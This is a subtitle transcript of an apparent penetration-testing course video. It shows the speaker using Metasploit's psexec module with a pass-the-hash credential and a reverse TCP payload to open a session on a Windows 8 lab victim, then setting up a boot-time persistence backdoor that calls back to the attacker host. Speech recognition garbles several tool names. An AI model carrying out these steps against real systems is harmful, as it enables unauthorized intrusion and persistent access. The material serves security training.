1
00:00:00,390 --> 00:00:04,710
‫So let's try to use them interpreters persistence method in a Windows eight victim.

2
00:00:15,510 --> 00:00:20,070
‫As you know, we need to have an interpreter session on the victim first.

3
00:00:20,580 --> 00:00:24,810
‫So I'm going to use this exact module to get the session on my Windows eight.

4
00:00:26,390 --> 00:00:27,800
‫Search exec.

5
00:00:28,970 --> 00:00:38,810
‫Use exploit Windows SMB, P exec said payload windows metro operator Reverse TCP.

6
00:00:39,590 --> 00:00:47,120
‫Now show the options and now the options are host as Windows eight L host as Carly.

7
00:00:48,920 --> 00:00:54,740
‫Username of my Windows eight was admin and password hash was on the desktop.

8
00:00:57,060 --> 00:01:03,870
‫Here, so I'll copy it and paste as the assembly passed.

9
00:01:04,800 --> 00:01:09,030
‫Now leave the ports by default values and run the exploit.

10
00:01:12,850 --> 00:01:13,250
‫There.

11
00:01:13,870 --> 00:01:17,740
‫Now we have an interpreter session on the Windows eight system.

12
00:01:19,030 --> 00:01:22,930
‫So we're insists info to check the system and the connection.

13
00:01:23,940 --> 00:01:25,320
‫And here are the results.

14
00:01:28,140 --> 00:01:32,790
‫So now let's run the persistence method with h first to see the parameters.

15
00:01:33,850 --> 00:01:36,100
‫And now we're ready to prepare the command.

16
00:01:37,630 --> 00:01:39,910
‫A to start handler automatically.

17
00:01:40,900 --> 00:01:49,870
‫Now, I don't set the payload this time because the default payload is exactly what I want x to autostart

18
00:01:49,870 --> 00:01:50,980
‫when the system boots.

19
00:01:52,490 --> 00:01:55,130
‫And 10 seconds between each try.

20
00:01:56,120 --> 00:01:57,350
‫Pay for the port, no.

21
00:01:57,620 --> 00:02:01,040
‫I'll use the port six, six, six six this time.

22
00:02:01,700 --> 00:02:10,190
‫And finally are for the listen host, which is calling for me to to to hit enter, to run the method.

23
00:02:12,030 --> 00:02:12,750
‫And it's finished.

24
00:02:13,410 --> 00:02:15,570
‫So let's look at the messages to see what happened.

25
00:02:16,860 --> 00:02:21,870
‫It says the persistent script has been written to the temp folder under the Windows Fault.

26
00:02:22,440 --> 00:02:25,650
‫So let's look at the victim machine and see if that's correct.

27
00:02:26,520 --> 00:02:29,760
‫We'll go to the temp folder in Windows Explorer.

28
00:02:31,040 --> 00:02:31,580
‫Oops!

29
00:02:32,600 --> 00:02:39,530
‫Windows Defender detected the file, so to cross-check, I go to the temp folder to see whether the

30
00:02:39,530 --> 00:02:41,060
‫script file is in there or not.

31
00:02:43,570 --> 00:02:45,730
‫No, the script is not here.

32
00:02:46,360 --> 00:02:53,950
‫It's detected by Windows Defender and deleted, so we should find another way to open a persistent back

33
00:02:53,950 --> 00:02:54,310
‫door.

34
00:02:55,000 --> 00:02:56,350
‫There's always more than one way.